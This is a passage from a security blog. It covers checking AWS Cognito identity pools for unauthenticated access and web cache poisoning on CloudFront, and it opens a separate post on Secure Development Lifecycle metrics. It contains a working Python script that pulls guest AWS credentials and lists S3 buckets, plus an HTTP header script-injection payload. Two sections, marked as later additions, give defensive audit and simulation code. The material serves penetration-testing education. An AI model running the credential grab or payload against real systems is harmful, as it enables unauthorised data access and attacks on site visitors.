Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login.</blockquote>
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCIv1qSXnJOK-b9IgjFKP3usDLAxE-kkhjy7USy5E6DVoOVxzaV4YAx0HNv26W08HX_NuTIJWF5gbNP1W1JLGgAY_E2GJ-SJvDZ-KMPu78yQhYIZy0z_0TqPdXAuts0ekm0ICnBYvX0DY/s1600/unauthenticated.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="144" data-original-width="687" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCIv1qSXnJOK-b9IgjFKP3usDLAxE-kkhjy7USy5E6DVoOVxzaV4YAx0HNv26W08HX_NuTIJWF5gbNP1W1JLGgAY_E2GJ-SJvDZ-KMPu78yQhYIZy0z_0TqPdXAuts0ekm0ICnBYvX0DY/s1600/unauthenticated.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
This is clearly something worth checking during the assessment of a web application that takes advantage of AWS Cognito.<br />
<br />
In fact, let's consider a web application that grants access to AWS S3 buckets only after proper authentication, with the identity pool providing temporary access to the bucket.<br />
<br />
Now suppose that the identity pool has also been configured to grant access to unauthenticated identities with the same privilege of accessing the AWS S3 buckets.<br />
<br />
<span style="background-color: white;">In such a situation, an attacker can obtain the application's AWS credentials without authenticating at all.</span><br />
<span style="background-color: yellow;"><br /></span>
The following Python script will try to get unauthenticated credentials and use them to list the AWS S3 buckets.<br />
<br /></div>
<div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
In the following script, just replace <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new", courier, monospace;">IDENTITY_POOL</span> with the Identity Pool ID identified during the assessment. </div>
<div>
<br /></div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383">
</span>
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<pre style="font-family: "courier new", courier, monospace; font-size: 10pt; margin: 0; white-space: pre-wrap;">
# NB: This script requires boto3.
# Install it with:
# sudo pip install boto3
import sys

import boto3
from botocore.exceptions import ClientError

# Replace with the Identity Pool ID identified during the assessment.
# The part before the colon is the AWS region the pool lives in and must
# match region_name below.
IDENTITY_POOL = "IDENTITY_POOL"

try:
    # Ask the pool for an identity without supplying any login
    client = boto3.client('cognito-identity', region_name="us-east-2")
    resp = client.get_id(IdentityPoolId=IDENTITY_POOL)

    print("\nIdentity ID: %s" % resp['IdentityId'])
    print("\nRequest ID: %s" % resp['ResponseMetadata']['RequestId'])

    # Exchange the identity for temporary credentials of the unauthenticated role
    resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
    secretKey = resp['Credentials']['SecretKey']
    accessKey = resp['Credentials']['AccessKeyId']
    sessionToken = resp['Credentials']['SessionToken']
    print("\nSecretKey: %s" % secretKey)
    print("\nAccessKey ID: %s" % accessKey)
    print("\nSessionToken %s" % sessionToken)

    # Get all bucket names visible to those credentials
    s3 = boto3.resource('s3', aws_access_key_id=accessKey,
                        aws_secret_access_key=secretKey,
                        aws_session_token=sessionToken,
                        region_name="eu-west-1")
    print("\nBuckets:")
    for b in s3.buckets.all():
        print(b.name)

except (ClientError, KeyError):
    # The pool refuses unauthenticated identities, or the role cannot list buckets
    print("No Unauth")
    sys.exit(0)
</pre>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383">
</span>
<br />
<div>
<br />
<br />
If unauthenticated user access to AWS S3 buckets is allowed, your output should look something like this:<br />
<br /></div>
</div>
<div>
<!--BEGIN OUTPUT-->
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944
<br />
<br />
Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793
<br />
<br />
SecretKey: wJE/[REDACTED]Kru76jp4i
<br />
<br />
AccessKey ID: ASI[REDACTED]MAO3
<br />
<br />
SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF<br />
<br />
Buckets:
<br />
mindeds3log
<br />
mindeds3test01
</div>
<!--END OUTPUT-->
<br />
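A defender-side complement to the script above, added here and not part of the original post: instead of obtaining credentials, it inspects the identity pool description and the policy of the unauthenticated role offline and flags the combination that makes the scenario above possible (guests allowed, and a guest role that can reach S3). It assumes the two documents were fetched beforehand with boto3 (the output of describe_identity_pool and the IAM policy document of the unauthenticated role); the response shape is modelled on the AWS API and every value below is constructed.<br />

```python
"""Offline triage of an AWS Cognito identity pool's unauthenticated access.

Added example, not part of the original post. Input is the pool description
(cognito-identity describe_identity_pool; its AllowUnauthenticatedIdentities
flag is what the console option shown above toggles) and the IAM policy
attached to the pool's unauthenticated role. Response shape is modelled on the
AWS API, sample values are constructed. Deny statements and conditions are not
evaluated, so treat the output as a triage aid, not a full policy evaluator.
"""
import fnmatch
import json

# Constructed sample of describe_identity_pool output for a pool that admits guests.
SAMPLE_POOL = {
    "IdentityPoolId": "us-east-2:00000000-0000-0000-0000-000000000000",  # placeholder ID
    "IdentityPoolName": "example_pool",
    "AllowUnauthenticatedIdentities": True,
}

# Constructed sample of an inline policy on the pool's unauthenticated role.
SAMPLE_UNAUTH_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["mobileanalytics:PutEvents", "cognito-sync:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:ListAllMyBuckets", "s3:GetObject"], "Resource": "*"},
    ],
})

# S3 actions that a guest identity should normally never hold.
SENSITIVE_ACTIONS = ("s3:ListAllMyBuckets", "s3:ListBucket", "s3:GetObject", "s3:PutObject")


def _as_list(value):
    """IAM allows either a single string or a list in Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def allowed_sensitive_actions(policy_doc):
    """Sensitive S3 actions granted by any Allow statement; wildcards such as
    s3:* or * are expanded by matching them against SENSITIVE_ACTIONS."""
    doc = json.loads(policy_doc) if isinstance(policy_doc, str) else policy_doc
    found = set()
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            for action in SENSITIVE_ACTIONS:
                # IAM action matching is case-insensitive and supports * and ?
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    found.add(action)
    return sorted(found)


def audit_identity_pool(pool, unauth_policy_doc=None):
    """Return a list of finding strings; an empty list means nothing to report."""
    findings = []
    if not pool.get("AllowUnauthenticatedIdentities"):
        return findings  # GetId without a login is refused by the pool
    findings.append("identity pool allows unauthenticated identities")
    if unauth_policy_doc is None:
        findings.append("unauthenticated role policy not supplied; review it manually")
        return findings
    actions = allowed_sensitive_actions(unauth_policy_doc)
    if actions:
        findings.append("unauthenticated role grants S3 access: " + ", ".join(actions))
    return findings


if __name__ == "__main__":
    for finding in audit_identity_pool(SAMPLE_POOL, SAMPLE_UNAUTH_POLICY):
        print("-", finding)
```

An empty list from audit_identity_pool is the desired state for an application that only needs authenticated access; if guest access is genuinely required, the guest role's policy should be scoped to the specific resources the anonymous part of the application needs rather than a bare "Resource": "*".<br />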
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_-0EZYHXOs7xtXH18y0jCmhOFXekmc1D_wr9VRpJyouliCMPnLSna0jTf2j-V_wz0wsNudXYmplVynTeZ6JpWyPYvhFQEuAqbGZoVpRgaLVwV9i5izoCkQ4u-noW4JDPsxum8F7Le32A/s1600/NetworkingContentDelivery_AmazonCloudFront.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="400" data-original-width="400" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_-0EZYHXOs7xtXH18y0jCmhOFXekmc1D_wr9VRpJyouliCMPnLSna0jTf2j-V_wz0wsNudXYmplVynTeZ6JpWyPYvhFQEuAqbGZoVpRgaLVwV9i5izoCkQ4u-noW4JDPsxum8F7Le32A/s200/NetworkingContentDelivery_AmazonCloudFront.png" width="200" /></a><br />
<br /></div>
<div>
<h3>
AWS CloudFront
</h3>
</div>
<div>
AWS CloudFront is Amazon's Content Delivery Network (CDN) service, whose purpose is to improve the performance of delivering content from web applications.<br />
The following images depict the basics of how CloudFront works.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dVmx2pRUTk8w6lUEJGleDw4EqslHQDypUlD9YRVy7SsoerM1inLFI7NQcO1spbYZaTidwZ755TB0_KazFp4TZQfjBrv3m_kuKRJUhE_fVNvR9iRcot2ujGjoVbzEYDxKPksogfpR40ys/s1600/CloudFront+01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="219" data-original-width="646" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dVmx2pRUTk8w6lUEJGleDw4EqslHQDypUlD9YRVy7SsoerM1inLFI7NQcO1spbYZaTidwZ755TB0_KazFp4TZQfjBrv3m_kuKRJUhE_fVNvR9iRcot2ujGjoVbzEYDxKPksogfpR40ys/s1600/CloudFront+01.png" /></a></div>
The browser requests <i>resource X</i> from the edge location.<br />
If the edge location has a cached copy of <i>resource X</i> it simply sends it back to the browser.<br />
<br />
The following picture describes what happens if <i>resource X</i> is not cached in the edge location.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF6Kd_Myda1gMZOxJuWEdbuwGlDJVhg-MbCXj4kueT6iXZ5h1ehzej-6Icfsasv7Cz8-b96qMK9SPW3NLZgE9Gn-2g8SYEfXumSl8m42R6caR5yD4Ply8TnyA2MG8F8L78uKLTxGTFjzIU/s1600/CloudFront+02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="282" data-original-width="1185" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF6Kd_Myda1gMZOxJuWEdbuwGlDJVhg-MbCXj4kueT6iXZ5h1ehzej-6Icfsasv7Cz8-b96qMK9SPW3NLZgE9Gn-2g8SYEfXumSl8m42R6caR5yD4Ply8TnyA2MG8F8L78uKLTxGTFjzIU/s640/CloudFront+02.png" width="640" /></a></div>
<br />
<br />
<br />
<ul>
<li>The browser requests <i>resource X</i> from the edge location, which doesn't have a cached version. </li>
<li>The edge location therefore requests <i>resource X</i> from its origin, meaning the place where the original copy of <i>resource X</i> is stored. (This is decided when configuring CloudFront for a given domain.) </li>
<li>The origin can be, for example, an Amazon service such as an S3 bucket, or a different server that is not part of Amazon. </li>
<li>The edge location receives <i>resource X</i>, stores it in its cache for future use and finally sends it back to the browser. </li>
</ul>
<br />
This simple caching mechanism can be very helpful when it comes to improving the performance of a web application, but it might also hide some unwanted behavior.<br />
<br /></div>
<div>
As recently shown by <a href="https://portswigger.net/blog/practical-web-cache-poisoning" target="_blank">James Kettle</a>, web applications that rely on caching for dynamic pages should be aware that such caching functionality can be abused to deliver malicious content to users, a technique known as cache poisoning.<br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">Briefly, as described by Kettle in </span><a href="https://portswigger.net/blog/practical-web-cache-poisoning" style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;" target="_blank">his post</a><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">, web cache systems need a way to uniquely identify a request so that they do not have to keep contacting the origin location. </span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">To do so, a few parts of an HTTP request are taken to fully identify it; these parts are called </span><b style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">cache keys</b><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">. Whenever a cache key changes, the caching system treats the request as a different one and, if it has no cached copy of it, contacts the origin location. </span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">The basic idea behind web cache poisoning is to find an HTTP parameter that is not part of the cache key but that still influences the content of the page. When such a parameter is found, an attacker might be able to get a response containing a malicious payload for that parameter stored in the cache so that, whenever other users perform the same request, the caching system answers with the cached version containing the payload.</span><br />
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;"><br /></span>
<span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;">Let's consider the following simple request taken from James' post:</span><br />
<span style="font-family: arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<!--BEGIN REQ-->
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">GET /en?cb=1 HTTP/1.1</span>
<br />
<span style="white-space: pre-wrap;">Host: www.redhat.com</span><br />
<span style="white-space: pre-wrap;">X-Forwarded-Host: <span style="color: orange;">canary</span></span><br />
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;">HTTP/1.1 200 OK</span><br />
<span style="white-space: pre-wrap;">Cache-Control: public, no-cache</span><br />
<span style="white-space: pre-wrap;">…</span><br />
<span style="white-space: pre-wrap;">&lt;meta property="og:image" content="https://<span style="color: orange;">canary</span>/cms/social.png" /&gt; </span>
</div>
<!--END REQ-->
<br />
<div>
<span id="docs-internal-guid-571bbcba-7fff-93a8-83c6-54581aeb470e">
</span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span id="docs-internal-guid-571bbcba-7fff-93a8-83c6-54581aeb470e"><span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">The value of X-Forwarded-Host has been used to generate an Open Graph URL inside a meta tag in the HTML of the web page. By replacing <span style="color: orange;">canary</span> with <span style="color: orange;">a."&gt;&lt;script&gt;alert(1)&lt;/script&gt; </span>it is possible to break out of the attribute, inject HTML and generate an alert box. </span></span><br />
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<!--BEGIN REQ2-->
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">GET /en?cb=1 HTTP/1.1</span>
<br />
<span style="white-space: pre-wrap;">Host: www.redhat.com</span><br />
<span style="white-space: pre-wrap;">X-Forwarded-Host: </span><span style="color: orange; white-space: pre-wrap;">a."&gt;&lt;script&gt;alert(1)&lt;/script&gt;</span><br />
<span style="white-space: pre-wrap;"><br /></span>
</div>
<!--END REQ2-->
<!--BEGIN RESP2-->
<br />
<br />
<div style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); font-family: "courier new", courier, monospace; font-size: 10pt; padding: 5px;">
<span style="white-space: pre-wrap;">HTTP/1.1 200 OK</span>
<br />
<span style="white-space: pre-wrap;">Cache-Control: public, no-cache</span><br />
<span style="white-space: pre-wrap;">…</span><br />
<span style="white-space: pre-wrap;">&lt;meta property="og:image" content="https://</span><span style="color: orange; white-space: pre-wrap;">a."&gt;&lt;script&gt;alert(1)&lt;/script&gt;</span><span style="white-space: pre-wrap;">/cms/social.png" /&gt; </span>
</div>
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 11pt;"><br /></span></span>
<span style="font-family: arial; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 11pt;">However, in this case X-Forwarded-Host is not used as a cache key. This means that the response containing the alert code can be stored in the web cache and served to other users in the future. As James' post makes clear, X-Forwarded-Host and X-Forwarded-Server are two widely used HTTP headers that do not contribute to the set of cache keys and are therefore valuable candidates for cache poisoning attacks. </span></span>James has also developed a Burp plug-in called <a href="https://github.com/PortSwigger/param-miner" target="_blank">param-miner</a> that can be used to identify HTTP parameters that are not used as cache keys.<br />
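To make the two mechanisms above concrete, the miss/origin/store flow from the CloudFront description and the unkeyed-header problem from Kettle's example, here is a small edge-cache model. It is an added example, not code from the original post, from CloudFront or from PortSwigger: a reflecting origin is placed behind a cache keyed only on method, path and Host, and the same scenario is then replayed with X-Forwarded-Host added to the cache key and with an origin that ignores the header. All hostnames, paths and values are constructed; the attacker-controlled value is a plain hostname rather than a script payload.<br />

```python
"""Edge-cache model: cache keys, X-Forwarded-Host and cache poisoning.

Added example, not code from the original post, CloudFront or PortSwigger.
It replays the flow described above (edge miss -> origin -> store -> later hit)
and shows that a header which changes the response but is not part of the
cache key (X-Forwarded-Host here) lets one crafted request's response be
served to later visitors, and that keying on the header or having the origin
ignore it prevents that. Hostnames, paths and values are constructed.
"""
import re


def make_request(path, host, forwarded_host=None):
    """Build a minimal GET request; forwarded_host is the untrusted header value."""
    headers = {"Host": host}
    if forwarded_host is not None:
        headers["X-Forwarded-Host"] = forwarded_host
    return {"method": "GET", "path": path, "headers": headers}


def vulnerable_origin(request):
    """Origin that builds an absolute Open Graph URL from X-Forwarded-Host when the
    header is present (the behaviour of the quoted redhat.com example)."""
    headers = request["headers"]
    host = headers.get("X-Forwarded-Host", headers["Host"])
    body = '<meta property="og:image" content="https://%s/cms/social.png" />' % host
    return {"status": 200, "headers": {"Cache-Control": "public, max-age=60"}, "body": body}


def hardened_origin(request):
    """Same page, but absolute URLs are built from a server-side canonical hostname,
    so no request header can influence the cached response."""
    canonical_host = "www.example.com"  # constructed canonical hostname
    body = '<meta property="og:image" content="https://%s/cms/social.png" />' % canonical_host
    return {"status": 200, "headers": {"Cache-Control": "public, max-age=60"}, "body": body}


class EdgeCache:
    """Minimal CDN edge: a miss fetches from the origin and stores the response,
    a hit serves the stored copy. keyed_headers lists the request headers that form
    part of the cache key; which headers are keyed is a CDN configuration choice."""

    def __init__(self, origin, keyed_headers=("Host",)):
        self.origin = origin
        self.keyed_headers = tuple(keyed_headers)
        self.store = {}
        self.origin_fetches = 0

    def cache_key(self, request):
        parts = [request["method"], request["path"]]
        for name in self.keyed_headers:
            parts.append("%s=%s" % (name, request["headers"].get(name, "")))
        return "|".join(parts)

    def fetch(self, request):
        key = self.cache_key(request)
        if key in self.store:
            return dict(self.store[key], cached=True)
        response = self.origin(request)
        self.origin_fetches += 1
        if request["method"] == "GET" and response["status"] == 200:
            self.store[key] = response  # cacheable: keep it for future visitors
        return dict(response, cached=False)


def og_image_host(body):
    """Host of the og:image URL in the rendered page, or None if absent."""
    match = re.search(r'content="https://([^/"]+)/', body)
    return match.group(1) if match else None


def poisoning_demo(origin, keyed_headers=("Host",)):
    """One request carrying a crafted X-Forwarded-Host fills the cache, then an
    ordinary visitor asks for the same page. Returns (host the visitor sees,
    whether the visitor was served from cache)."""
    cache = EdgeCache(origin, keyed_headers)
    cache.fetch(make_request("/en", "www.example.com", forwarded_host="attacker.example"))
    visitor = cache.fetch(make_request("/en", "www.example.com"))
    return og_image_host(visitor["body"]), visitor["cached"]


if __name__ == "__main__":
    print("unkeyed header, reflecting origin:", poisoning_demo(vulnerable_origin))
    print("header added to the cache key:    ", poisoning_demo(vulnerable_origin, ("Host", "X-Forwarded-Host")))
    print("origin ignores the header:        ", poisoning_demo(hardened_origin))
```

The first run returns the attacker-supplied host from the cache, which is the poisoning case; adding the header to the key isolates the poisoned entry but still lets anyone who sends the header receive a reflected page, so the origin-side fix (never derive absolute URLs from a forwarded header the CDN does not vouch for) is the one that removes the root cause.<br />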
<div>
<h3>
Conclusion</h3>
</div>
<div>
This post concludes our journey into the main Amazon Web Services and how to account for them when testing the security of web applications.<br />
It is undeniable that AWS provides a comprehensive solution that companies can take advantage of instead of having to manage the entire infrastructure themselves. However, companies remain in charge of the configuration of the services they decide to use. It thus becomes crucial to test and verify such configurations.</div>
</div>
</div>
Federico De Meohttp://www.blogger.com/profile/13823957133316817764noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-4568978048957118312019-04-11T01:52:00.000-07:002019-04-11T01:52:26.968-07:00Secure Development Lifecycle: the SDL value evolution. Part 1<div class="graf graf--p graf-after--h3" id="4be8" name="4be8" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Observability and metrics paradox</span></div>
<div class="graf graf--p graf-after--p" id="305c" name="305c" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
It is also about observability: <em class="markup--em markup--p-em" style="font-feature-settings: "liga", "salt";">“If a tree falls in a forest and no one is around to hear it, does it make a sound?”</em> …or… What is the return value (in dollars) of having a better SDL in place if your company wasn’t shaken by cybersecurity incidents? I see a little paradox here: after spending a big budget on security you cannot measure the returns; even more, the returns become less visible, because you don’t have incidents in the first place…and if they happen then “someone saves you”. You may have prevented 9 out of 10 incidents, but it is difficult to make a counterfactual argument at that point.</div>
<div class="graf graf--p graf-after--p" id="b1ef" name="b1ef" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Oh yes, if you had big problems in the past you can then see the statistical improvements over time, as Microsoft did.</div>
<br />
<figure class="graf graf--figure graf-after--p" id="0797" name="0797" style="background-color: white; clear: both; margin: 43px 0px 0px;"><img class="progressiveMedia-image js-progressiveMedia-image" data-src="https://cdn-images-1.medium.com/max/1600/0*k2B9aWyuvuscA9A2" src="https://cdn-images-1.medium.com/max/1600/0*k2B9aWyuvuscA9A2" style="display: block; margin: auto; max-width: 700px;" /></figure><br />
<blockquote class="graf graf--blockquote graf-after--figure" id="9b8e" name="9b8e" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 38px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
From: <a href="https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf">https://www.owasp.org/images/9/92/OWASP_SwSec5D_Presentation_-_Oct18.pdf</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="e012" name="e012" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">What the Microsoft case teaches</span></div>
<div class="graf graf--p graf-after--p" id="45c6" name="45c6" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Microsoft enjoyed a strong market position and still dealt with security in the early 2000s. Not every company has a de facto monopoly in its market. Your company has competitors and alternatives, and it needs its reputation… and let’s not dig too deep into cyber-fine scenarios.</div>
<div class="graf graf--p graf-after--p" id="277b" name="277b" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
In the early 2000s Microsoft put great effort into defining and applying its SDL, and the Microsoft SDL is still the reference implementation today. That was the genesis of SDL as we know it; practices like STRIDE threat modeling are now de facto industry standards.</div>
<div class="graf graf--p graf-after--p" id="0663" name="0663" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Fortunately, the metrics paradox is being weakened by the fact that <span class="markup--strong markup--p-strong" style="font-weight: 700;">SDL is becoming a value in itself</span>: something that can be shown, that complements quality, that enhances reputation and marketing, and that is substance more than form (not only compliance). Below we will see how security principles are taking over from formal compliance checklists.</div>
<div class="graf graf--p graf-after--p" id="c442" name="c442" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Dear &lt;big tech firm here&gt;, can I evaluate your Secure Development Lifecycle?</span></div>
<div class="graf graf--p graf-after--p" id="ecf8" name="ecf8" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Supply chain customers</span> are starting to demand a secure process itself, not only secure products and certifications (assuming that is even plausible). One example is the UK Government’s relationship with Huawei, but I’m confident others will follow. The next extract is from the <a class="markup--anchor markup--p-anchor" data-href="https://www.gov.uk/government/publications/huawei-cyber-security-evaluation-centre-oversight-board-annual-report-2019" href="https://www.gov.uk/government/publications/huawei-cyber-security-evaluation-centre-oversight-board-annual-report-2019" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Huawei cyber security evaluation centre oversight board: annual report 2019</a>:</div>
<blockquote class="graf graf--blockquote graf--startsWithDoubleQuote graf-after--p" id="9404" name="9404" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
“3.35 …analysed the adherence of the product to part of Huawei’s own secure coding guidelines, namely safe memory handling functions. … analysed for the use … of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants.”</blockquote>
<div class="graf graf--p graf-after--blockquote" id="1df7" name="1df7" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Not many companies with some complexity and history could comfortably survive a similar analysis.</div>
<div class="graf graf--p graf-after--p" id="75d9" name="75d9" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Principles-based practices and the cyber-environmental safety requirement</span></div>
<div class="graf graf--p graf-after--p" id="a783" name="a783" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The demand for security cannot be met by compliance requirements alone. Compliance, in its various forms (PCI, ISO xxxx), is still a necessary “sine qua non” condition, but customers and counterparties demand more substance behind it. We can observe this “substance winning over form”, for example, in GDPR as a principles-based regulation, as well as in the demand on key vendors for the results of their security processes (see the Huawei report from the government cyber security agency).</div>
<blockquote class="graf graf--blockquote graf-after--p" id="2141" name="2141" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
